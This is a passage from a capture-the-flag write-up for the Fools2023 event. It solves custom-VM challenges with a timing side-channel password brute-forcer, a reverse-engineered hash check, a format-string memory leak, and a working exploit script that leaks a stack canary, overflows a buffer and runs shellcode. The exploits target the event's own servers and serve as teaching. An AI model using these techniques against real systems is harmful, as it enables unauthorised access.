p.expect("Password: ")
p.sendline(password)
current = time.time()
idx = p.expect([">> Password is incorrect", "Ready."])
if idx == 1:
print(f"Found correct password while measuring time: {password}")
now = time.time()
delta = now - current
times.append(delta)
return statistics.mean(times)
def check_lengths(p: pexpect.spawn):
for i in range(0, 20):
duration = measure_time("A" * i, p)
print(f"Length: {i}, average duration {duration * 1000.0}ms ")
def swapchar(input: str, position: int, replacement: str) -> str:
b = bytearray(input.encode("ascii"))
b[position] = replacement.encode("ascii")[0]
return b.decode("ascii")
def mutate_entrypoint(password: str, times: List[Tuple[str, float]], p: pexpect.spawn) -> None:
duration = measure_time(password, p)
print(f"{password.ljust(max_pass_length)}: {duration * 1000.0} ms")
times.append((password, duration))
def mutate(password: str, position: int, alphabet: str, conns: List[pexpect.spawn]) -> List[Tuple[str, float]]:
times = []
i = 0
while i < len(alphabet):
threads: List[threading.Thread] = []
for j in range(min(max_connections, len(alphabet) - i)):
mutated = swapchar(password, position, alphabet[i])
i += 1
idx = j
thread = threading.Thread(target=mutate_entrypoint, args=(mutated, times, conns[idx]))
threads.append(thread)
for thread in threads:
thread.start()
time.sleep(0.1)
for thread in threads:
thread.join()
return times
def generation(initial_pass: str, initial_generation: int, conns: List[pexpect.spawn]):
password = initial_pass
for i in range(initial_generation, len(password)):
print(f" ========== GENERATION {i + 1}/{len(password)} ========== ")
mutations = mutate(password, i, alphabet, conns)
slowest = max(mutations, key=lambda v: v[1])
print(f"Slowest path was {slowest[0]}, with {slowest[1] * 1000.0} ms. Setting as next generation.")
password = slowest[0]
def spawn_connections(count: int) -> List[pexpect.spawn]:
print("Spawning connections..")
conns = []
for i in range(0, count):
process = pexpect.spawn("nc fools2023.online 13338")
conns.append(process)
time.sleep(2)
return conns
def warmup_connections(conns: List[pexpect.spawn]) -> None:
print("Warming up connections..")
warmup_alphabet = alphabet[0:len(conns)]
mutate("A" * max_pass_length, 0, warmup_alphabet, conns)
def main():
parser = argparse.ArgumentParser()
parser.add_argument("seed", help="Initial password to use", type=str, default="A" * max_pass_length)
parser.add_argument("generation", help="Initial generation to use (index of first unconfirmed character)", type=int,
default=0)
args = parser.parse_args()
conns = spawn_connections(max_connections)
warmup_connections(conns)
generation(args.seed, args.generation, conns)
if __name__ == '__main__':
main()
The script averages 5 response times for the same character, to hopefully (keyword: hopefully) drown out any potential noise.
Let’s run the script and see how this works. For example, these are the response times for the first character:
AAAAAAAAAAAAAAA: 1496.6235637664795 ms
BAAAAAAAAAAAAAA: 1493.7345027923584 ms
CAAAAAAAAAAAAAA: 1496.8590259552002 ms
DAAAAAAAAAAAAAA: 1500.450611114502 ms
EAAAAAAAAAAAAAA: 1495.4945087432861 ms
...
vAAAAAAAAAAAAAA: 1508.9350700378418 ms
sAAAAAAAAAAAAAA: 1575.4240989685059 ms <--
wAAAAAAAAAAAAAA: 1508.9693546295166 ms
The ‘s’ character caused a massive increase in response time, and as such this will be the character that is assumed to be correct for the next generation. We can even tell we’re on the right track, as the base average of all checks will now rise to that value in the next generation which makes it extremely obvious:
sAAAAAAAAAAAAAA: 1582.4370861053467 ms
sCAAAAAAAAAAAAA: 1580.9272289276123 ms
sBAAAAAAAAAAAAA: 1593.3728694915771 ms
sDAAAAAAAAAAAAA: 1576.1115074157715 ms
sEAAAAAAAAAAAAA: 1568.9205169677734 ms
However, as should be expected from computer networks, this WILL fail. For example, sometimes the latency increases unexpectedly and all of the checker connections observe an increased response time. This obviously does not indicate that the character is correct, and this exact failure mode is why the script allows re-running with human-controlled input.
JAAAAAAAAAAAAAA: 1511.2834453582764 ms
KAAAAAAAAAAAAAA: 1595.2083587646484 ms <-- WRONG
MAAAAAAAAAAAAAA: 1578.5706520080566 ms <-- WRONG
LAAAAAAAAAAAAAA: 1573.9030838012695 ms <-- WRONG
OAAAAAAAAAAAAAA: 1571.5668678283691 ms <-- WRONG
NAAAAAAAAAAAAAA: 1580.980920791626 ms <-- WRONG
In general, this exploit was extremely painful to get working, because of the above issue. Most of the time, I had to manually analyze the response times and choose something that looks like the right way forward, and check if my assumption was correct and the baseline average response time actually rose. In the end however, the exploit worked and I got a password (keyword: a password, we’ll learn about this soon).
======================================================================
Welcome to Glitch Research Laboratory Network: Test Server 2 (GRLTS02)
======================================================================
This machine requires authentication.
Username: ax.arwen
>> Please wait...
>> Username OK. Password required
Password: sYpiB;705*X
>> Please wait...
>> Login successful.
======================================================================
Running machine language monitor now.
======================================================================
*** BREAK INTO MONITOR AT $F0A0 ***
R0=$0000 R1=$C3FF R2=$F37D R3=$F1F7
SP=$FEFE [A1F000000000000000000000]
Ready.
> ls
BLK SIZE NAME
=======================
01 0400 ENCTABLE.BIN
02 0165 MIXTEST.PRG
04 0026 FLAG.TXT
And here’s our flag!
> rf
> Filename? FLAG.TXT
> Which address? 1000
Loaded.
Ready.
> p
> Which address? 1000
FOOLS2023_{SolidAuthenticationScheme}
Ready.
>
Flag #7 - HACKERMANS v2
After logging into GRLTS02, the first thing I did was dump the monitor from there as well, to hopefully figure out the password authentication scheme.
I noticed that, along with the username of ‘ax.arwen’, there was also a mention of ‘sbw.shadow’ in the dumped executable. Trying it out in the login prompt
revealed that it is indeed a valid login! I tried using the password sidechannel from before, while seeding it with the values of the flag prefix (as I assumed
the password would be the next flag), and I actually got a working password! The server allowed me to log in with the pass (FOOLS2023_{Y3.0ngSH@iA}
), however
the website did not accept this as a flag. What the heck?
This motivated me to find the password check routine in the monitor, which you can see below:
; password validity check
$F058: 99 04 F1 call $F104 # <None> ; r2 = pass buffer
$F05B: 10 01 00 mov r0, $0001
$F05E: 11 00 C0 mov r1, $C000
$F061: 06 04 swi 4 ; loads from the ENCTABLE.bin file
$F063: 96 pop r2
$F064: 13 EC F1 mov r3, $F1EC
$F067: 93 push r3
$F068: 11 00 C0 mov r1, $C000
$F06B: 43 mov r0, byte ptr [r3]
$F06C: 34 add r1, r0
$F06D: 13 00 00 mov r3, $0000
$F070: 41 mov r0, byte ptr [r1]
$F071: 3C add r3, r0
$F072: E1 00 01 add r1, $0100
$F075: 41 mov r0, byte ptr [r1]
$F076: 3C add r3, r0
$F077: E1 00 01 add r1, $0100
$F07A: 41 mov r0, byte ptr [r1]
$F07B: 3C add r3, r0
$F07C: E1 00 01 add r1, $0100
$F07F: 41 mov r0, byte ptr [r1]
$F080: 3C add r3, r0
$F081: 23 mov r0, r3
$F082: CD FF 00 and r0, $00FF
$F085: 46 mov r1, byte ptr [r2]
$F086: 81 cmp r0, r1
$F087: 9D B8 F0 jne $F0B8
$F08A: 97 pop r3
$F08B: 99 C1 F0 call $F0C1 # <None>
$F08E: AA inc r2
$F08F: AB inc r3
$F090: 42 mov r0, byte ptr [r2]
$F091: A2 00 00 cmp r0, $0000
$F094: 9C 9A F0 je $F09A
$F097: 98 67 F0 jmp $F067 # <None>
; this is related to the password checking
; i think this is the "rotate" the enctable part
$F0C1: B0 00 C0 mov r0, byte ptr [$C000]
$F0C4: B8 00 F1 mov byte ptr [$F100], low(r0)
$F0C7: B0 00 C1 mov r0, byte ptr [$C100]
$F0CA: B8 01 F1 mov byte ptr [$F101], low(r0)
$F0CD: B0 00 C2 mov r0, byte ptr [$C200]
$F0D0: B8 02 F1 mov byte ptr [$F102], low(r0)
$F0D3: B0 00 C3 mov r0, byte ptr [$C300]
$F0D6: B8 03 F1 mov byte ptr [$F103], low(r0)
$F0D9: 11 00 C0 mov r1, $C000
$F0DC: A9 inc r1
$F0DD: 41 mov r0, byte ptr [r1]
$F0DE: AD dec r1
$F0DF: 64 mov byte ptr [r1], low(r0)
$F0E0: A9 inc r1
$F0E1: A3 FF C3 cmp r1, $C3FF
$F0E4: 9D DC F0 jne $F0DC
$F0E7: B0 00 F1 mov r0, byte ptr [$F100]
$F0EA: B8 FF C0 mov byte ptr [$C0FF], low(r0)
$F0ED: B0 01 F1 mov r0, byte ptr [$F101]
$F0F0: B8 FF C1 mov byte ptr [$C1FF], low(r0)
$F0F3: B0 02 F1 mov r0, byte ptr [$F102]
$F0F6: B8 FF C2 mov byte ptr [$C2FF], low(r0)
$F0F9: B0 03 F1 mov r0, byte ptr [$F103]
$F0FC: B8 FF C3 mov byte ptr [$C3FF], low(r0)
$F0FF: 05 ret
The password check utilizes a table loaded from the ENCTABLE.BIN
file on the filesystem, and adds up some values looked up in it based on the incoming
password byte. Additionally, after every character the table is rotated one byte to the left, i.e first byte -> last byte, second byte -> first byte and so on.
Each result byte is then compared to some predefined hash value stored in the monitor itself:
0000:1110 | 08 08 08 08 08 08 AC A2 00 00 9D 0F F1 05 61 78 | ......¬¢....ñ.ax
0000:1120 | 2E 61 72 77 65 6E 00 00 00 00 00 00 00 00[C6 44 | .arwen........ÆD < between [ ]
0000:1130 | 99 E3 E9 19 0D 07 0D 12 79]00 00 00 00 00 00 00 | .ãé.....y....... <
0000:1140 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
0000:1150 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
0000:1160 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 73 62 | ..............sb
0000:1170 | 77 2E 73 68 61 64 6F 77 00 00 00 00 00 00[E9 22 | w.shadow......é" < between [ ]
0000:1180 | D8 7C 3C 07 54 2D 5E 53 6A FF 80 5E CD C8 CF FF | Ø|<.T-^Sjÿ.^ÍÈÏÿ <
0000:1190 | 44 74 C8 D8 4B]00 00 00 00 00 00 00 00 00 00 00 | DtÈØK........... <
What is immediately apparent from this, is that there can be multiple correct passwords for one hash! Unfortunately, my sidechannel seems to have hit that specific case, and I got the right password but not the correct flag. Let’s make a Python script for the password check:
c000 = [
# table here
]
target = [
0xE9, 0x22, 0xD8, 0x7C, 0x3C, 0x07, 0x54, 0x2D, 0x5E, 0x53, 0x6A, 0xFF, 0x80, 0x5E, 0xCD, 0xC8,
0xCF, 0xFF, 0x44, 0x74, 0xC8, 0xD8, 0x4B
]
def calc_sum(byte: int, rotations: int) -> int:
return (c000[(rotations + byte) % len(c000)] + c000[(rotations + byte + 0x100) % len(c000)] + c000[
(rotations + byte + 0x200) % len(c000)] + c000[(rotations + byte + 0x300) % len(c000)]) & 0xFF
def search(hash_byte: int, rotations: int) -> List[int]:
potential_outputs = []
for i in range(0, 0x100):
checksum = calc_sum(i, rotations)
if checksum == hash_byte:
potential_outputs.append(i)
return potential_outputs
def disp_bytes(b: List[int]) -> str:
out = ""
for byte in b:
out += f"{byte}('{chr(byte)}')"
return out
for i in range(0, len(target)):
valid_bytes = search(target[i], i)
print(f"pass[{i}] = {disp_bytes(valid_bytes)}")
This dumps all possible bytes for the password in each position, based on the given hash value. Let’s run this on the sbw.shadow
hash:
pass[0] = 70('F')
pass[1] = 79('O')
pass[2] = 79('O')84('T')127('')
pass[3] = 76('L')
pass[4] = 15('')83('S')139('')
pass[5] = 20('')50('2')
pass[6] = 48('0')
pass[7] = 50('2')89('Y')
pass[8] = 10(b'\n')51('3')105('i')235('ë')245('õ')
pass[9] = 95('_')246('ö')
pass[10] = 123('{')
pass[11] = 89('Y')
pass[12] = 51('3')
pass[13] = 5('')46('.')100('d')230('æ')240('ð')
pass[14] = 21('')48('0')
pass[15] = 110('n')191('¿')
pass[16] = 103('g')203('Ë')212('Ô')
pass[17] = 83('S')
pass[18] = 11(b'\n')72('H')84('T')165('¥')
pass[19] = 64('@')134('')
pass[20] = 105('i')186('º')
pass[21] = 60('<')65('A')108('l')
pass[22] = 101('e')125('}')
Based on this, we can fix up our sidechannel password (FOOLS2023_{Y3.0ngSH@iA}
) and try the rest of the combinations. A few tries later, I found the correct flag manually: FOOLS2023_{Y3d0ngST@il}
Flag #8 - MIXTEST
Welcome to hell.
I’m going to be perfectly honest, this one was pure hell and I’m not even fully convinced I got my understanding of the opcodes right. This section will be significantly shorter, as this was more of a creative exercise in trying to figure out what the multiple nested instruction sets are mapped to. The executable is similar to other ones, except the password check is obfuscated under multiple layers of different instruction sets. This is the obfuscated instruction stream containing the password check:
0000:0020 | 07 A7 4C | .§L
0000:0030 | 21 FC F0 A7 71 58 1A 65 3B 20 DF 78 37 4F 21 FC | !üð§qX.e; ßx7O!ü
0000:0040 | C2 54 5F A4 6D DD 49 20 49 95 8B 4D 21 67 2A F2 | ÂT_¤mÝI I..M!g*ò
0000:0050 | F2 5B 1C 01 3B 58 20 8A 4D FF FF 64 5B 01 02 3B | ò[..;X .Mÿÿd[..;
0000:0060 | 5B 20 5C | [ \
The password input is stored at address $214C
. The following is a hand-made disassembly of the above instruction stream, and the breadcrumbs that lead to the correct
password.
07 - MIX OPCODE
; PART 1
A7 4C 21
- mov r1, $214C
FC
- inc r1 ($214D)
F0
- mov r0, [r1]
A7 71 58
- mov r1, $5871 ; 'Xq'
1A
- cmp r0, r1
65 3B 20
- jne $203B
DF
- inc r3
; current password:
; 214C = ???????
; 214D = q
; 214E = X
; PART 2
@label_203B:
78
- executes UNTIL a 0x0 byte is read as the opcode (data bytes don't count)
- tldr; begin instruction set $78
37 4F 21
- mov r0, [$214F] ; this must be '9f' <- password characters
FC C2 54
- xor r0, $54C2
5F A4 6D
- cmp r0, $6DA4 ; m¤
DD 49 20
- jne $2049
49
- inc r3
; current password:
; 214C = ???????
; 214D = q
; 214E = X
; 214F = f
; 2150 = 9
; PART 3
; R0 = $6DA4
; R1 = $5871
; R2 = $20E4
; R3 = $0002 (success count)
; SP=$FEFA [4A204CF216F0000000000000]
@label_2049:
95 - begin instruction set $95
8B 4D 21
- mov r1, $214D
67
- dec r1
2A
- movb r0, [r1] ; this must be 'G'
F2
- lsl r0
F2
- lsl r0
5B 1C 01
- cmp r0, $011C ; ... $011C >> 2
3B 58 20
- jne $2058
8A
- inc r3
; current password:
; 214C = G
; 214D = q
; 214E = X
; 214F = f
; 2150 = 9
; this is just a delay i think
@label_2058:
4D FF FF
- mov r0, $FFFF
64 @label_205B
- dec r0
5B 01 02
- cmp r0, $0201
3B 5B 20
jne $205B
5C - end instruction set $95
; current password:
; 214C = G
; 214D = q
; 214E = X
; 214F = f
; 2150 = 9
; length check - 5 characters + null terminator
$2063: B0 51 21 mov r0, byte ptr [$2151]
$2066: A2 00 00 cmp r0, $0000
$2069: 9D 6D 20 jne $206D
$206C: AB inc r3
The password is GqXf9
, and the flag is, as the output tells us, is FOOLS2023_{GqXf9}
.
MIX/UNMIX opcodes - proof of concept
Enter a password: GqXf9
Validating...
Yes, it's correct! FOOLS2023_{*insert correct pass here*}
Ready.
Debugging these nested instruction sets was an absolute pain, as any error in terminating any of them results in an ILLEGAL OPCODE
, without any indication
of what happened. The process was basically identical to the initial architecture discovery process, and finding out the length of the opcodes was helpful
in associating the mixed opcodes with the original ones. Additionally, the data bytes of the mixed opcodes were thankfully left intact, which allowed to
easily reason which ones were jumps/data loads.
This flag wraps up everything we can do on GRLTS02.
GRLINFSRV
Flag #9 - Dumping the monitor
GLINFSRV does not allow us to do much, we enter a name and the only thing we can do is print one of the three pre-existing topics or quit the server entirely.
Welcome to Glitch Research Lab Information Server (GRLINFSRV)
Enter your name for our records (max 15 characters): TEST
-----
Welcome, TEST!
Selection of topics:
(1) About the Glitch Research Laboratory
(2) About the GLVM test servers
(3) About the Fight Simulation Program
Enter the number of the topic you wish to view, or 'q' to leave:
The maximum characters in the name immediately points towards this being some sort of buffer overflow, and putting in more characters does give a crash when trying to interact with the server further. As pointed to by a previous text file, this server has some sort of stack canary implemented, which immediately halts the machine if it’s corrupted.
Welcome to Glitch Research Lab Information Server (GRLINFSRV)
Enter your name for our records (max 15 characters): AAAAAAAAAAAAAAA
-----
Welcome, AAAAAAAAAAAAAAA!
Selection of topics:
(1) About the Glitch Research Laboratory
(2) About the GLVM test servers
(3) About the Fight Simulation Program
Enter the number of the topic you wish to view, or 'q' to leave: Q
*** stack smashing detected *** C606794C != 0006794C - halted
However, this seems to be a red herring, as the actual display name does not change beyond the 15 allowed characters. Additionally, no matter how many characters you make your name, this never results in corruption of the canary beyond the first byte.
At this point, I went back to disassembling the monitor, in hopes of finding something I missed. And indeed, there is a very crucial thing about how the monitor
prints the registers that I did not notice before. Below is the string that is passed to PrintStr
when printing the machine registers:
0000:1B20 | 42 52 45 41 4B 20 49 4E 54 4F 20 4D 4F 4E 49 54 | BREAK INTO MONIT
0000:1B30 | 4F 52 20 41 54 20 24 F0 C0 FB 20 2A 2A 2A 0A 52 | OR AT $ðÀû ***.R
0000:1B40 | 30 3D 24 F0 B6 FB 20 52 31 3D 24 F0 B8 FB 20 52 | 0=$ð¶û R1=$ð¸û R
0000:1B50 | 32 3D 24 F0 BA FB 20 52 33 3D 24 F0 BC FB 0A 53 | 2=$ðºû R3=$ð¼û.S
0000:1B60 | 50 3D 24 F0 BE FB 20 5B F1 C2 FB F1 C3 FB F1 C4 | P=$ð¾û [ñÂûñÃûñÄ
0000:1B70 | FB F1 C5 FB F1 C6 FB F1 C7 FB F1 C8 FB F1 C9 FB | ûñÅûñÆûñÇûñÈûñÉû
0000:1B80 | F1 CA FB F1 CB FB F1 CC FB F1 CD FB 5D 0A 00 | ñÊûñËûñÌûñÍû]..
This string is not modified before printing. How come the register values are printed correctly, just by calling PrintStr
, but without any prior
pre-processing by the monitor? Notice how after the register strings there’s special 3-byte sequences; for example, printing R0=
is followed by F0 B6 FB
.
This sequence is actually a read memory format string! If we search the disassembly of the GRLTS02 monitor:
; trap instruction entrypoint
$F37E: A6 push sp
$F37F: BC B6 FB mov [$FBB6], r0
$F382: BD B8 FB mov [$FBB8], r1
$F385: BE BA FB mov [$FBBA], r2
$F388: BF BC FB mov [$FBBC], r3
$F38B: 94 pop r0
$F38C: BC BE FB mov [$FBBE], r0
When entering the monitor (trap instruction execution), all of the registers are saved under predefined addresses, which are then used as part of the format
string to print the register values, without having to modify the string at all! The F0
format is used to read a 16-bit value little-endian, and F1
can
be used to read a single byte from memory (this is how the stack is dumped!). Does this format string work under GRLINFSRV’s name printing, as well?
$ echo -e "\xf0\x00\xfe" | nc fools2023.online 13339
Welcome to Glitch Research Lab Information Server (GRLINFSRV)
Enter your name for our records (max 15 characters):
-----
Welcome, 81D7
!
The answer is yes! Using this, we can now dump out the entire contents of the monitor memory from GRLINFSRV. You can find the dumper here: https://github.com/Muzuwi/fools23/src/grlinfsrv_ram_dumper.py
The dumper reads the entire monitor memory using prepared format strings, and after some string manipulation to extract the bytes, we can recreate the entire monitor memory. It uses read16 formats for MAXIMUM SPEED™, which also requires swapping the endianness of the result (as we’re reading words at a time on a little-endian machine).
One very interesting gotcha is that the address being read from in the format string cannot contain the $0A
byte in the high or low byte. Yup, that’s the newline
character which causes the name input to terminate immediately. I work around this by using a 16-bit read at offset $09
, and just discarding the lower byte.
And just like that, we have our next flag, located within the dumped monitor memory:
0000:0710 | 69 61 6C 2E 0A 00 46 4F 4F 4C 53 32 30 32 33 5F | ial...FOOLS2023_
0000:0720 | 7B 44 6F 65 73 54 68 69 73 43 6F 75 6E 74 41 73 | {DoesThisCountAs
0000:0730 | 46 6F 72 6D 61 74 53 74 72 69 6E 67 7D 0A 00 F0 | FormatString}..ð
Flag #10 - Final Pwn
We’ve dumped the memory, there’s one last thing left to do on this server - total pwn and executing our own code. With the monitor dumped using the previous flag, we can investigate how the server implements username reading, string printing and all the canary check goodness.
The monitor disassembly is pretty straightforward this time around. Here’s how we’re reading the name at the first server prompt:
; read name
$F019: 12 3F F7 mov r2, $F73F
$F01C: 13 0F 00 mov r3, $000F
$F01F: 99 30 00 call $0030 # <ReadStr>
$F022: 12 3F F7 mov r2, $F73F
The name is stored at $F73F
, and a max length of $0F
is provided to the BIOS ReadStr
routine. The canary is initialized with some random values using
swi 5
like this:
;stack canary
$F000: 09 00 FF mov sp, $FF00
$F003: 06 05 swi 5
$F005: BC 00 FE mov [$FE00], r0 ; one copy of the canary at $FE00
$F008: BC 4F F7 mov [$F74F], r0 ; one copy at $F74F
$F00B: 06 05 swi 5
$F00D: BC 02 FE mov [$FE02], r0
$F010: BC 51 F7 mov [$F751], r0
Interestingly, the stack canary and the string buffer overlap, but only by one byte. Provided the BIOS routine does not do anything weird, the name seems like a dead end when it comes to overflowing the buffer. The name is not the only string input on this server, there’s also the choice of topic to print. How is that implemented, then?
; read selection
$F048: 12 53 F7 mov r2, $F753
$F04B: 99 A7 F0 call $F0A7 # <None>
; read chars
$F0A7: 06 02 swi 2
$F0A9: 68 mov byte ptr [r2], low(r0)
$F0AA: A2 0A 00 cmp r0, $000A ; immediately after newline, jump to the canary check
$F0AD: 9C BB F0 je $F0BB
$F0B0: A5 00 00 cmp r3, $0000
$F0B3: 9C B8 F0 je $F0B8
$F0B6: AA inc r2
$F0B7: AF dec r3
$F0B8: 98 A7 F0 jmp $F0A7 # <None>
It uses a little helper that directly reads user input, completely bypassing the BIOS. The method at $F0A7
implicitly requires R3
to be set to the maximum
number of bytes to read from input, however such an assignment is missing for the call at $F04B
! This means that the amount of characters written to memory,
starting at $F753
, will be dependent upon leftover values from previous instructions. This can be quickly verified by using the format string arbitrary read
presented in the earlier flag, as the name is conveniently printed after every invalid number input! Surely enough, after the second input, the value of
R3
was massaged into being big enough that we can write arbitrary bytes to memory, starting from $F753
.
However, how do we get to code-exec from here? Conveniently, the stack is located a bit further away from this buffer. One potential roadblock to just blindly
overflowing the buffer is the canary check: it is stored in two locations, at $FE00
and $F74F
. After every single user input operation, the canary is checked
again, and execution halts immediately when they do not match. Unfortunately, the canary at $FE00
stands in our way of total pwn of GRLINFSRV. Can we do something
else about it? The format string arbitrary read comes to save us, once again! Using that, we can leak the stack canary from $F74F
even before we start
the actual buffer overflow. We can thus adjust our payload, and sneakily write back the canary to be exactly the same, completely bypassing the check.
To sum up our exploitation strategy:
- Prepare name input - leak canary from
$F74F
by utilizing format string reads - Create overflow until
$FE00
- pad our input with bytes until we reach the canary address - Attach canary to input - using the leak from 1), add the valid canary to our buffer overflow
- Pad until we reach the stack - pad input with bytes until we reach some area near the stack
- Spray our own PC on the stack - just overwrite the entire stack with the target return address by repeating the return address in the payload
- ?????
- Pwned!
We can use some of the padding space between the important areas for our shellcode, and set the PC in the final phase accordingly. Enough theory, let’s see if it works:
import foolsocket
# read 4 bytes
def format_addr_dump(addr: int) -> bytes:
b = bytearray()
for i in range(addr, addr + 8, 2):
b += b'\xf0' + i.to_bytes(2, byteorder='little')
return bytes(b)
def extract_data_leak(out: bytes) -> bytes:
if not out.startswith(b'Please type 1, 2 or 3'):
raise RuntimeError("Unexpected response for leak")
hexvals = out[47:].split(b'\n')[0]
result = bytearray(bytes.fromhex(hexvals.decode('ascii')))
if len(result) % 2 != 0:
raise RuntimeError("Unexpected length of leaked bytes, expected power of two")
# We're dumping by using the read16 format specifier, this undoes
# the endianess, so we get the correct byte order
for i in range(0, len(result), 2):
temp = result[i]
result[i] = result[i + 1]
result[i + 1] = temp
return bytes(result)
def execute_on_infsrv(payload: bytes) -> bytes:
target_buffer_address = 0xF753
payload_target_address = 0xF800
canary_address = 0xFE00
stack_overwrite_start_address = 0xFE80
stack_overwrite_value = 0xF800
f = foolsocket.FoolsSocket("fools2023.online", 13339)
f.expect(b'characters): ')
f.communicate(format_addr_dump(canary_address - 2) + b'\n')
f.expect(b'to leave: ')
# Extract stack canary
f.communicate(b'A\n')
canary = extract_data_leak(f.expect(b'to leave: '))[2:6]
print(f"Stack canary: {canary}")
overflow_bytes = b'A' * (payload_target_address - target_buffer_address)
padding = b'B' * (canary_address - (payload_target_address + len(payload)))
stack_overwrite_padding = b'S' * (stack_overwrite_start_address - (canary_address + 4))
stack_overwrite = stack_overwrite_value.to_bytes(2, byteorder='little') * int(
(0xFF00 - stack_overwrite_start_address) / 2)
pwn = overflow_bytes + payload + padding + canary + stack_overwrite_padding + stack_overwrite + b'\n'
f.communicate(pwn)
return f.read_until_eof()
Let’s try running this simple payload, that should print the character 'A'
using swi 01
and then terminate the connection afterwards (using swi 03
):
out = execute_on_infsrv(b'\x10\x41\x00\x06\x01\x06\x03')
print(out)
And the results..?
╰─>$ python ./src/grlinfsrv_pwn.py
Stack canary: b'\xe1\x93\xffs'
b'A'
It works! We’ve achieved arbitrary code execution on GRLINFSRV. What can we do next? Remember that there’s a “file system” on these machines, so let’s use the same payload that was used to discover the hidden files on GRLTS01 to hopefully find something interesting.
And sure enough, in BLK 01 we have a secret file containing the final flag:
0000:0000 | 46 4F 4F 4C 53 32 30 32 33 5F 7B 54 68 69 73 44 | FOOLS2023_{ThisD
0000:0010 | 65 66 69 6E 69 74 65 6C 79 43 6F 75 6E 74 73 41 | efinitelyCountsA
0000:0020 | 73 42 69 6E 61 72 79 45 78 70 6C 6F 69 74 61 74 | sBinaryExploitat
0000:0030 | 69 6F 6E 7D 0A 00 00 00 00 00 00 00 00 00 00 00 | ion}............
Format strings, buffer overflows, total pwnage, oh my!
Closing thoughts
Once again, sincere thank you to TheZZAZZGlitch for organizing this event once again. It has been great fun, and I’m hoping next year we’ll
have less nested instruction sets be able to take part in this amazing CTF again.